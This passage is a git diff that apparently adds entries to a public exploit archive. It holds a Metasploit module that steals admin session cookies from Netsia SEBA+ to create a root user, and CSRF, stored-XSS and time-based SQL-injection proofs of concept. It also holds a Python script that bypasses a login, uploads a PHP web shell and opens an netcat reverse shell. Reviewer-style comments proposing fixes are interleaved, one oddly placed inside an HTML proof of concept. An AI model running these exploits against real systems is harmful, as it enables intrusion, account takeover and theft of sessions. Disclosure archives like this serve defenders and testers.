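a name ending in `.xml.php`) is a usable signature for web-server log review.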
diff --git a/exploits/multiple/webapps/49435.rb b/exploits/multiple/webapps/49435.rb
new file mode 100755
index 000000000..03ba3a5ce
--- /dev/null
+++ b/exploits/multiple/webapps/49435.rb
@@ -0,0 +1,112 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Netsia SEBA+ <= 0.16.1 Authentication Bypass and Add Root User' ,
+ 'Description' => %q{
+ This module exploits an authentication bypass in Netsia SEBA+, triggered by add new root/admin user.
+ HTTP requests made to the "Active Sessions" section which can be accessed by root/admin user,
+ can be performed without the need for any session(cookie) information.
+ Therefore, the session cookie informations of the active users in the application can be read from the response content.
+ A new authorized user can be created with the obtained cookie.
+ },
+ 'References' =>
+ [
+ [ 'CVE', '' ],
+ [ 'URL', 'https://www.pentest.com.tr/exploits/Netsia-SEBA-0-16-1-Authentication-Bypass-Add-Root-User-Metasploit.html' ],
+ [ 'URL', 'https://www.netsia.com' ]
+ ],
+ 'Author' =>
+ [
+ 'Özkan Mustafa AKKUŞ ' # Discovery & PoC & MSF Module @ehakkus
+ ],
+ 'License' => MSF_LICENSE,
+ 'DisclosureDate' => "2021-01-06",
+ 'DefaultOptions' => { 'SSL' => true }
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(443),
+ OptString.new('USERNAME', [true, 'The username for your new account']),
+ OptString.new('PASSWORD', [true, 'The password for your new account', Rex::Text.rand_text_alphanumeric(14)])
+ ])
+ end
+
+ def peer
+ "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
+ end
+
+ def check
+ begin
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"),
+ )
+
+ rescue
+ return Exploit::CheckCode::Unknown
+ end
+
+ if res.code == 200 and res.body.include? 'sessionId'
+ return Exploit::CheckCode::Vulnerable
+ else
+ if res.code == 200 and res.body.include? 'SUCCESS'
+ print_status("Target is vulnerable! 
But active admin session was not found. Try again later.") + return Exploit::CheckCode::Appears + end + end + + return Exploit::CheckCode::Safe + end + + def count_user(data, find_string) + data.scan(/(?=#{find_string})/).count + end + + def run + unless Exploit::CheckCode::Vulnerable == check + fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') + end + + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"), + ) + sescount = count_user(res.body,'"name"') + print_good("Currently #{sescount} active sessions have been detected.") + + cookies = res.body.scan(/sessionId":"([\S\s]*?)","action/) + puts cookies + $i = 0 + + while $i <= sescount do + sessloop = cookies[$i] + sessid = "SESSION=" + sessloop.to_s + cookie = sessid.split('"]').join('').split('["').join('') + $i +=1 + json_data='{"data": {"password": "' + datastore["PASSWORD"] + '", "roles": [{"locations": [], "name": "admin", "permList": [{"data": ["/alarm-manager/alarm/definition/list", "/alarm-manager/alarm/active/list", "/alarm-manager/alarm/active/get", "/alarm-manager/alarm/log/list", "/alarm-manager/alarm/log/search"], "perm_key": "alarm:view"}, {"data": ["/sepon-core/profile/get/service", "/sepon-core/profile/list/service"], "perm_key": "services:view"}, {"data": ["/sepon-core/node/list/edge-ext"], "perm_key": "edge-ext:view"}, {"data": ["/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "uiconfig:view"}, {"data": ["/pal/switchinfo/list"], "perm_key": "switch:view"}, {"data": ["/asup/bbsl"], "perm_key": "asup:bbsl"}, {"data": ["/sepon-core/node/list", "/sepon-core/node/get"], "perm_key": "location:view"}, {"data": ["/pal/olt/get", "/pal/olt/nniport", "/pal/olt/ponport", "/pal/inventory/olt-list", "/sepon-core/node/list/olt", "/pal/laginfo/get"], "perm_key": "olt:view"}, {"data": ["/bbsl*/olt/reboot"], "perm_key": "olt:reboot"}, {"data": ["/sepon-core/node/delete"], "perm_key": "edge:delete"}, 
{"data": ["/user/add"], "perm_key": "default"}, {"data": ["/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/provision", "/bbsl*/subscriber/preprovision", "/bbsl*/subscriber/provision-subscriber", "/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/continue-provision-with-service-definition", "/bbsl*/subscriber/delete-service", "/bbsl*/subscriber/delete-services", "/bbsl*/subscriber/provision-service", "/bbsl*/subscriber/update-service-subscription"], "perm_key": "subscriptions:edit"}, {"data": ["/authentication-server/user/add", "/authentication-server/user/update"], "perm_key": "user:edit"}, {"data": ["/home/dashboard", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:edit"}, {"data": ["/sepon-core/node/delete/force"], "perm_key": "edge:forcedelete"}, {"data": ["/sepon-core/profile/delete/service"], "perm_key": "services:delete"}, {"data": ["/bbsl*/onu/provision-onu", "/bbsl*/onu/undo-provision", "/sepon-core/node/update", "/bbsl*/onu/delete-onu", "/bbsl*/onu/provision-onu", "/bbsl*/onu/update-serial", "/bbsl*/onu/onu-power"], "perm_key": "onu:edit"}, {"data": ["/alarm-manager/response-code"], "perm_key": "alarm:response-code"}, {"data": ["/authentication-server/request/list", "/authentication-server/request/search", "/authentication-server/request/count"], "perm_key": "request_history:view"}, {"data": ["/sepon-core/profile/add/service"], "perm_key": "services:edit"}, {"data": ["/authentication-server/user/delete"], "perm_key": "user:delete"}, {"data": ["/pal/speedprofile/delete", "/sepon-core/profile/delete/speed"], "perm_key": "speed_profiles:delete"}, {"data": ["/sepon-core/profile/sync/security", "/sepon-core/profile/add/sync/security", "/sepon-core/profile/delete/sync/security", "/sepon-core/profile/get/sync/security", "/sepon-core/profile/list/sync/security", "/sepon-core/profile/list/sync/security/by-profile-id", 
"/sepon-core/profile/list/sync/security/by-edge-id"], "perm_key": "security_profiles:sync"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:perf-query"}, {"data": ["/authentication-server/user/list", "/authentication-server/user/get"], "perm_key": "user:view"}, {"data": ["/bbsl*/onu/reboot"], "perm_key": "onu:reboot"}, {"data": ["/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/service-subscription", "/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-onu-serial-uni-no-service-name", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/uni-subscription-info-location"], "perm_key": "subscriptions:view"}, {"data": ["/pal/technologyprofile/get", "/pal/technologyprofile/list", "/sepon-core/profile/get/tech", "/sepon-core/profile/list/tech"], "perm_key": "tech_profiles:view"}, {"data": ["/authentication-server/response-code"], "perm_key": "auth:response-code"}, {"data": ["/sepon-core/node/move"], "perm_key": "location:move"}, {"data": ["/pal/olt-location/add"], "perm_key": "oltlocation:edit"}, {"data": ["/sepon-core/node/delete"], "perm_key": "location:delete"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "dashboard:view"}, {"data": ["/authentication-server/role/list", "/authentication-server/role/get"], "perm_key": "role:view"}, {"data": ["/sepon-core/profile/sync/service", "/sepon-core/profile/add/sync/service", "/sepon-core/profile/delete/sync/service", "/sepon-core/profile/get/sync/service", 
"/sepon-core/profile/list/sync/service", "/sepon-core/profile/list/sync/service/by-profile-id", "/sepon-core/profile/list/sync/service/by-edge-id"], "perm_key": "services:sync"}, {"data": ["/sepon-core/node/get/root", "/pal/inventory/all", "/pal/inventory/pon-port-list", "/pal/inventory/uni-list", "/pal/inventory/onu-list", "/pal/inventory/olt-list", "/pal/switchinfo/list", "/pal/inventory/olt", "/pal/inventory/olt-list", "/pal/inventory/olt-location-list", "/pal/inventory/onu", "/pal/inventory/onu-list", "/pal/inventory/onu-with-serial-number", "/pal/inventory/pon-port", "/pal/inventory/pon-port-list", "/pal/inventory/uni", "/pal/inventory/uni-list", "/pal/inventory/uni"], "perm_key": "topology:view"}, {"data": ["/bbsl*/subscriber/update-service-subscription-status"], "perm_key": "services:statuschange"}, {"data": ["/sepon-core/profile/sync/speed", "/sepon-core/profile/add/sync/speed", "/sepon-core/profile/delete/sync/speed", "/sepon-core/profile/get/sync/speed", "/sepon-core/profile/list/sync/speed", "/sepon-core/profile/list/sync/speed/by-profile-id", "/sepon-core/profile/list/sync/speed/by-edge-id"], "perm_key": "speed_profiles:sync"}, {"data": ["/bbsl*/property/add", "/bbsl*/property/update", "/bbsl*/property/delete"], "perm_key": "property:edit"}, {"data": ["/sepon-core/node/add/edge", "/sepon-core/node/refresh/edge", "/sepon-core/node/get/edge", "/sepon-core/node/update"], "perm_key": "edge:edit"}, {"data": ["/sepon-core/profile/sync/tech", "/sepon-core/profile/add/sync/tech", "/sepon-core/profile/delete/sync/tech", "/sepon-core/profile/get/sync/tech", "/sepon-core/profile/list/sync/tech", "/sepon-core/profile/list/sync/tech/by-profile-id", "/sepon-core/profile/list/sync/tech/by-edge-id"], "perm_key": "tech_profiles:sync"}, {"data": ["/bbsl*/olt/delete"], "perm_key": "olt:delete"}, {"data": ["/sepon-core/node/list/edge", "/sepon-core/node/get/edge"], "perm_key": "edge:view"}, {"data": ["/sepon-core/node/add/location", "/sepon-core/node/update"], "perm_key": 
"location:edit"}, {"data": ["/alarm-manager/alarm/resolve"], "perm_key": "alarm:edit"}, {"data": ["/discovery/list"], "perm_key": "discovery:view"}, {"data": ["/pal/property/get"], "perm_key": "property:view"}, {"data": ["/sepon-core/node/move"], "perm_key": "edge:move"}, {"data": ["/asup/pal"], "perm_key": "asup:pal"}, {"data": ["/authentication-server/role/delete"], "perm_key": "role:delete"}, {"data": ["/pal/switchinfo/update"], "perm_key": "topology:edit"}, {"data": ["/pal/olt-location/delete"], "perm_key": "oltlocation:delete"}, {"data": ["/bbsl*/onu/disable", "/bbsl*/onu/enable"], "perm_key": "onu:statuschange"}, {"data": ["/alarm-manager/event/definition/list", "/alarm-manager/event/log/list", "/alarm-manager/event/log/search"], "perm_key": "event:view"}, {"data": ["/pal/technologyprofile/delete", "/sepon-core/profile/delete/tech"], "perm_key": "tech_profiles:delete"}, {"data": ["/pal/speedprofile/add", "/pal/speedprofile/create", "/sepon-core/profile/add/speed"], "perm_key": "speed_profiles:edit"}, {"data": ["/authentication-server/role/add", "/authentication-server/role/update"], "perm_key": "role:edit"}, {"data": ["/edge-*"], "perm_key": "gateway-test:view"}, {"data": ["/bbsl*/olt/add", "/sepon-core/node/update"], "perm_key": "olt:edit"}, {"data": ["/service-admin"], "perm_key": "service-admin:view"}, {"data": ["/asup/seba-central"], "perm_key": "asup:core"}, {"data": ["/alarm-manager/mailNotification/add", "/alarm-manager/mailNotification/update", "/alarm-manager/mailNotification/delete"], "perm_key": "alarm-mail:edit"}, {"data": ["/pal/securityprofile/get", "/pal/securityprofile/list", "/sepon-core/profile/get/security", "/sepon-core/profile/list/security"], "perm_key": "security_profiles:view"}, {"data": ["/alarm-manager/mailNotification/list", "/alarm-manager/mailNotification/active/list", "/alarm-manager/mailNotification/get"], "perm_key": "alarm-mail:view"}, {"data": ["/bbsl*/subscriber/delete", "/bbsl*/subscriber/delete-all-subscriber", 
"/bbsl*/subscriber/delete-list-of-service"], "perm_key": "subscriptions:delete"}, {"data": ["/bbsl*/olt/disable", "/bbsl*/olt/enable"], "perm_key": "olt:statuschange"}, {"data": ["/authentication-server/permission/list", "/authentication-server/permission/getByUser"], "perm_key": "permission:view"}, {"data": ["/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "uiconfig:edit"}, {"data": ["/response-code"], "perm_key": "gateway:response-code"}, {"data": ["/pal/speedprofile/all", "/pal/speedprofile/get", "/pal/speedprofile/list", "/sepon-core/profile/get/speed", "/sepon-core/profile/list/speed"], "perm_key": "speed_profiles:view"}, {"data": ["/pal/ont/device", "/pal/ont/uniport", "/pal/ont/whitelist", "/pal/inventory/onu-list", "/pal/ont/stats-by-olt-number", "/pal/ont/stats-by-pon-port-number", "/pal/ont/search"], "perm_key": "onu:view"}, {"data": ["/pal/securityprofile/delete", "/sepon-core/profile/delete/security"], "perm_key": "security_profiles:delete"}, {"data": ["/pal/securityprofile/add", "/pal/securityprofile/create", "/sepon-core/profile/add/security"], "perm_key": "security_profiles:edit"}, {"data": ["/temip_integration/get_alarm_list"], "perm_key": "temip:view"}, {"data": ["/authentication-server/session/list"], "perm_key": "session:view"}, {"data": ["/stats-manager/response-code"], "perm_key": "stat:response-code"}, {"data": ["/bbsl*/onu/delete-onu"], "perm_key": "onu:delete"}, {"data": ["/pal/olt-location/get", "/pal/inventory/olt-location-list", "/sepon-core/node/list/oltLocation"], "perm_key": "oltlocation:view"}, {"data": ["/pal/technologyprofile/add", "/sepon-core/profile/add/tech"], "perm_key": "tech_profiles:edit"}]}, {"locations": [], "name": "default", "permList": [{"data": ["/user/add"], "perm_key": "default"}]}, {"locations": [{"id": 1, "name": "root"}], "name": "root", "permList": []}], "status": "ACTIVE", "username": "' + datastore["USERNAME"] + '"}}' + + res = send_request_raw({ + 'method' => 'POST', + 'ctype' => 
'application/json', + 'uri' => normalize_uri(target_uri.path, 'authentication-server', 'user', 'add'), + 'cookie' => cookie, + 'data' => json_data + }) + + if res.code == 200 and res.body.include? '"SUCCESS"' + print_good("Excellent! User #{datastore["USERNAME"]} was added successfully with root, admin and default privileges.") + print_good("Username : #{datastore["USERNAME"]}") + print_good("Password : #{datastore["PASSWORD"]}") + break + end + end + end +end \ No newline at end of file diff --git a/exploits/php/webapps/49426.html b/exploits/php/webapps/49426.html new file mode 100644 index 000000000..f1c9d3301 --- /dev/null +++ b/exploits/php/webapps/49426.html @@ -0,0 +1,26 @@ +# Exploit Title: PHP-Fusion CMS 9.03.90 - Cross-Site Request Forgery (Delete admin shoutbox message) +# Date: 2020-12-21 +# Exploit Author: Mohamed Oosman B S +# Vendor Homepage: https://www.php-fusion.co.uk/ +# Software Link: https://www.php-fusion.co.uk/phpfusion_9_downloads.php +# Version: 9.03.90 and below +# Tested on: Windows 10 +# CVE : CVE-2020-35687 + +1. Description: +PHP-Fusion version 9.03.90 is vulnerable to CSRF attack which leads to deletion of shoutbox messages by the attacker on behalf of the logged in victim. + +2. Proof of Concept +As the requests for deleting the admin shoutbox are sent using the GET method, the CSRF attack to delete an attacker-controlled shoutbox message can be performed by having the admin visit https://TARGET.com/infusions/shoutbox_panel/shoutbox_archive.php?s_action=delete&shout_id=1 directly, +after getting to know the shout_id of the message, as it is sequential. + + + + +
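Review bot: `puts cookies` in `run` dumps every session identifier read from the response to stdout, so live administrator tokens from the tested system end up in terminal scrollback and any captured console log; drop the line, since the preceding `print_good` already reports the session count. The `[ 'CVE', '' ]` reference is an empty placeholder and should be removed until an identifier exists. The description would also serve defenders better with one sentence naming the fix the text implies: `session/list/allActiveSession` must require an authenticated admin session and should not return other users' session identifiers. For detection, the pattern visible in this module is an unauthenticated GET to that path followed by a POST to `authentication-server/user/add`.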
+ + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/49427.txt b/exploits/php/webapps/49427.txt new file mode 100644 index 000000000..409ae81c3 --- /dev/null +++ b/exploits/php/webapps/49427.txt @@ -0,0 +1,22 @@ +# Exploit Title: WordPress Plugin Easy Contact Form 1.1.7 - 'Name' Stored Cross-Site Scripting (XSS) +# Date: 14/01/2021 +# Exploit Author: Rahul Ramakant Singh +# Vendor Homepage: https://ghozylab.com/plugins/ +# Software Link: https://demo.ghozylab.com/plugins/easy-contact-form-plugin/ +# Version: 1.1.7 +# Tested on Windows + +Steps: + +1. Install WordPress 5.6 +2. Install and activate *Contact Form Plugin* plugin. + +3. Go to * Contact Form Plugin *plugin section and click on the add new form button. + +4. Fill all required details and click on the save button and capture the request in a proxy tool like burp suite. + +6. Append the JavaScript payload in the "Email Header" field as mentioned below + +*""* + +5. You will observe that the payload successfully got stored and reflected into the response and the malicious JavaScript payload got executed successfully and we are getting a pop-up. \ No newline at end of file diff --git a/exploits/php/webapps/49428.txt b/exploits/php/webapps/49428.txt new file mode 100644 index 000000000..c61c116de --- /dev/null +++ b/exploits/php/webapps/49428.txt 
@@ -0,0 +1,22 @@
+# Exploit Title: Online Hotel Reservation System 1.0 - Stored Cross-site Scripting
+# Exploit Author: Mesut Cetin
+# Date: 2021-01-14
+# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0
+
+######## Description ########
+
+The room 'description' parameter is vulnerable to stored Cross-site Scripting.
+
+
+######## Proof of Concept #########
+
+Login with administrator credentials at http://localhost/admin with admin:admin and click on "Rooms" tab.
+
+Edit "description" parameter:
+
+1
+
+Any user at http://localhost/marimar/index.php will get the XSS pop-up warning with their cookie values.
\ No newline at end of file
diff --git a/exploits/php/webapps/49429.txt b/exploits/php/webapps/49429.txt
new file mode 100644
index 000000000..304fc042e
--- /dev/null
+++ b/exploits/php/webapps/49429.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Online Hotel Reservation System 1.0 - 'id' Time-based SQL Injection
+# Exploit Author: Mesut Cetin
+# Date: 2021-01-14
+# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0
+
+######## Description ########
+
+Vulnerable to SQL Injection.
+
+// vulnerable parameter at include/room.php, line 25:
+
+$mydb->setQuery("SELECT * FROM ".self::$tbl_name." Where `ROOMID`= {id} LIMIT 1");
+
+######## Proof of Concept #########
+
+The 'id' parameter at http://localhost/marimar/admin/mod_room/index.php?view=edit&id=11 is vulnerable to time-based SQL injection.
+
+Payload: (select*from(select(sleep(10)))a)
+
+Proof of Concept:
+
+http://localhost/marimar/admin/mod_room/index.php?view=edit&id=(select*from(select(sleep(10)))a)
\ No newline at end of file
diff --git a/exploits/php/webapps/49430.txt b/exploits/php/webapps/49430.txt
new file mode 100644
index 000000000..a45e757f4
--- /dev/null
+++ b/exploits/php/webapps/49430.txt
@@ -0,0 +1,33 @@ +# Exploit Title: Online Hotel Reservation System 1.0 - Cross-site request forgery (CSRF) +# Exploit Author: Mesut Cetin +# Date: 2021-01-14 +# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html +# Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0 + +######## Description ######## + +Vulnerable to Cross-site request forgery (CSRF), can lead to full account takeover of Administrator account. + +######## Proof of Concept ######### + +Send the victim the following PoC: + + + + +
+ + + + + + + + + + +
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/49431.txt b/exploits/php/webapps/49431.txt
new file mode 100644
index 000000000..0b2fd1d4e
--- /dev/null
+++ b/exploits/php/webapps/49431.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Online Hotel Reservation System 1.0 - 'person' time-based SQL Injection
+# Exploit Author: Mesut Cetin
+# Date: 2021-01-15
+# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0
+
+######## Description ########
+
+The 'person' parameter is vulnerable to time-based SQL Injection.
+
+
+######## Proof of Concept #######
+
+Payload: (select*from(select(sleep(10)))a)
+
+Using Burp Suite, send the following POST request:
+
+POST /marimar/index.php?p=booking HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: de,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 71
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/marimar/index.php?p=booking
+Cookie: PHPSESSID=cf40af0022f401c8cfd0be17fc00a6cc
+Upgrade-Insecure-Requests: 1
+
+arrival=01%2F19%2F2021&departure=01%2F11%2F2021&person=(select*from(select(sleep(10)))a)&accomodation=0
\ No newline at end of file
diff --git a/exploits/php/webapps/49433.txt b/exploits/php/webapps/49433.txt
new file mode 100644
index 000000000..a91b69d30
--- /dev/null
+++ b/exploits/php/webapps/49433.txt
@@ -0,0 +1,14 @@
+# Exploit Title: Alumni Management System 1.0 - "Last Name field in Registration page" Stored XSS
+# Exploit Author: Siva Rajendran
+# Date: 2020-12-31
+# Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code
+# Affected Version: Version 1
+# Tested on: Windows 10, Firefox Version 84.0
+
+Step 1. Go to sign up page
+
+Step 2. In the "Last Name" field, use the following XSS payload
+"> as the name and click on save.
+
+Step 3. This should trigger the Stored XSS payload in admin panel users tab, once the admin login into the application to verify the registered users email address. The attacker steals the admin session cookie
\ No newline at end of file
diff --git a/exploits/php/webapps/49434.py b/exploits/php/webapps/49434.py
new file mode 100755
index 000000000..85ecd8f45
--- /dev/null
+++ b/exploits/php/webapps/49434.py
@@ -0,0 +1,93 @@ +# Exploit Title: E-Learning System 1.0 - Authentication Bypass & RCE +# Exploit Author: Himanshu Shukla & Saurav Shukla +# Date: 2021-01-15 +# Vendor Homepage: https://www.sourcecodester.com/php/12808/e-learning-system-using-phpmysqli.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/caiwl.zip +# Version: 1.0 +# Tested On: Kali Linux + XAMPP 7.4.4 +# Description: E-Learning System 1.0 - Authentication Bypass Via SQL Injection + Remote Code Execution + +#Step 1: run the exploit in python with this command: python3 exploit.py +#Step 2: Input the URL of the vulnerable application: Example: http://10.10.10.23/caiwl/ +#Step 3: Input your LHOST where you want the reverse shell: Example: 10.9.192.23 +#Step 4: Input your LPORT that is the port where the reverse shell will spawn: Example: 4444 +#Step 5: Start a Netcat Listener on the port specified in Step 4 using this command: nc -lnvp 4444 +#Step 6: Hit enter on the if your Netcat Listener is ready, and you will get a reverse shell as soon as you hit enter. + +import requests + +print('########################################################') +print('## E-LEARNING SYSTEM 1.0 ##') +print('## AUTHENTICATION BYPASS & REMOTE CODE EXECUTION ##') +print('########################################################') + +print('Author - Himanshu Shukla & Saurav Shukla') + +GREEN = '\033[32m' # Green Text +RED = '\033[31m' # Red Text +RESET = '\033[m' # reset to the defaults +#Create a new session +s = requests.Session() + +#Set Cookie +cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} + +LINK=input("Enter URL of The Vulnarable Application : ") + +#Authentication Bypass +print("[*]Attempting Authentication Bypass...") +values = {"user_email":"'or 1 or'", "user_pass":"lol","btnLogin":""} +r=s.post(LINK+'admin/login.php', data=values, cookies=cookies) + +r=s.post(LINK+'admin/login.php', data=values, cookies=cookies) + +#Check if Authentication was bypassed or not. 
+logged_in = True if("You login as Administrator." in r.text) else False +l=logged_in +if l: + print(GREEN+"[+]Authentication Bypass Successful!", RESET) +else: + print(RED+"[-]Failed To Authenticate!", RESET) + + +#Creating a PHP Web Shell + +phpshell = { + 'file': + ( + 'shell.php', + '', + 'application/x-php', + {'Content-Disposition': 'form-data'} + ) + } + +# Defining value for form data +data = {'LessonChapter':'test', 'LessonTitle':'test','Category':'Docs','save':''} + + + +#Uploading Reverse Shell +print("[*]Uploading PHP Shell For RCE...") +upload = s.post(LINK+'/admin/modules/lesson/controller.php?action=add', cookies=cookies, files=phpshell, data=data, verify=False) + +shell_upload = True if("window.location='index.php'" in upload.text) else False +u=shell_upload +if u: + print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) +else: + print(RED+"[-]Failed To Upload The PHP Shell!", RESET) + +print("[*]Please Input Reverse Shell Details") +LHOST=input("[*]LHOST : ") +LPORT=input("[*]LPORT : ") + +print('[*]Start Your Netcat Listener With This Command : nc -lvnp '+LPORT) +input('[*]Hit Enter if your netcat shell is ready. ') +print('[+]Deploying The Web Shell...') + + +#Executing The Webshell +e=s.get('http://192.168.1.5/caiwl/admin/modules/lesson/files/shell.php?cmd=nc 192.168.1.2 9999 -e /bin/bash', cookies=cookies) + +exit() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 78871fb32..6edff21bf 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
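Review bot: The header comments explain how to run the script but never state the root causes or a fix, which is what someone triaging this entry against their own deployment needs. From the requests it sends, two defects are implied: `admin/login.php` accepts the `user_email` value `'or 1 or'`, which suggests the login query is built by string concatenation, and `admin/modules/lesson/controller.php?action=add` stores an uploaded `.php` file under a web-served `files/` directory. I would add a header line such as `# Mitigation: parameterized login query; allow-list upload extensions and store uploads where the web server will not execute them`. As a style point, `logged_in = True if(... in r.text) else False` followed by `l=logged_in` is redundant; `logged_in = "You login as Administrator." in r.text` says the same thing, and the same applies to `shell_upload`/`u`.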
@@ -25884,6 +25884,9 @@ id,file,description,date,author,type,platform,port 12866,exploits/php/webapps/12866.txt,"K9 Kreativity Design - 'pages.php' SQL Injection",2010-06-03,Newbie_Campuz,webapps,php, 12867,exploits/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,webapps,php, 12868,exploits/php/webapps/12868.txt,"Joomla! Component com_lead - SQL Injection",2010-06-03,ByEge,webapps,php, +49433,exploits/php/webapps/49433.txt,"Alumni Management System 1.0 - _Last Name field in Registration page_ Stored XSS",2021-01-15,"Siva Rajendran",webapps,php, +49434,exploits/php/webapps/49434.py,"E-Learning System 1.0 - Authentication Bypass & RCE POC",2021-01-15,"Himanshu Shukla",webapps,php, +49435,exploits/multiple/webapps/49435.rb,"Netsia SEBA+ 0.16.1 - Authentication Bypass and Add Root User (Metasploit)",2021-01-15,AkkuS,webapps,multiple, 40091,exploits/php/webapps/40091.rb,"Tiki Wiki 15.1 - File Upload (Metasploit)",2016-07-11,"Mehmet Ince",webapps,php,80 30170,exploits/php/webapps/30170.txt,"Beehive Forum 0.7.1 - 'links.php' Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",webapps,php, 18593,exploits/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",2012-03-14,n0tch,webapps,php, 
@@ -43625,3 +43628,10 @@ id,file,description,date,author,type,platform,port 49423,exploits/php/webapps/49423.txt,"Online Shopping Cart System 1.0 - 'id' SQL Injection",2021-01-14,"Aydın Baran Ertemir",webapps,php, 49424,exploits/php/webapps/49424.py,"Laravel 8.4.2 debug mode - Remote code execution",2021-01-14,"SunCSR Team",webapps,php, 49425,exploits/hardware/webapps/49425.py,"Cisco RV110W 1.2.1.7 - 'vpn_account' Denial of Service (PoC)",2021-01-14,"Shizhi He",webapps,hardware, +49426,exploits/php/webapps/49426.html,"PHP-Fusion CMS 9.03.90 - Cross-Site Request Forgery (Delete admin shoutbox message)",2021-01-15,"Mohamed Oosman",webapps,php, +49427,exploits/php/webapps/49427.txt,"WordPress Plugin Easy Contact Form 1.1.7 - 'Name' Stored Cross-Site Scripting (XSS)",2021-01-15,"Rahul Ramakant Singh",webapps,php, +49428,exploits/php/webapps/49428.txt,"Online Hotel Reservation System 1.0 - 'description' Stored Cross-site Scripting",2021-01-15,"Mesut Cetin",webapps,php, +49429,exploits/php/webapps/49429.txt,"Online Hotel Reservation System 1.0 - 'id' Time-based SQL Injection",2021-01-15,"Mesut Cetin",webapps,php, +49430,exploits/php/webapps/49430.txt,"Online Hotel Reservation System 1.0 - Cross-site request forgery (CSRF)",2021-01-15,"Mesut Cetin",webapps,php, +49431,exploits/php/webapps/49431.txt,"Online Hotel Reservation System 1.0 - 'person' time-based SQL Injection",2021-01-15,"Mesut Cetin",webapps,php, +49432,exploits/multiple/webapps/49432.sh,"EyesOfNetwork 5.3 - File Upload Remote Code Execution",2021-01-15,"Audencia Business SCHOOL Red Team",webapps,multiple, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 2e25c10fe..dd7c1ce9c 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv 
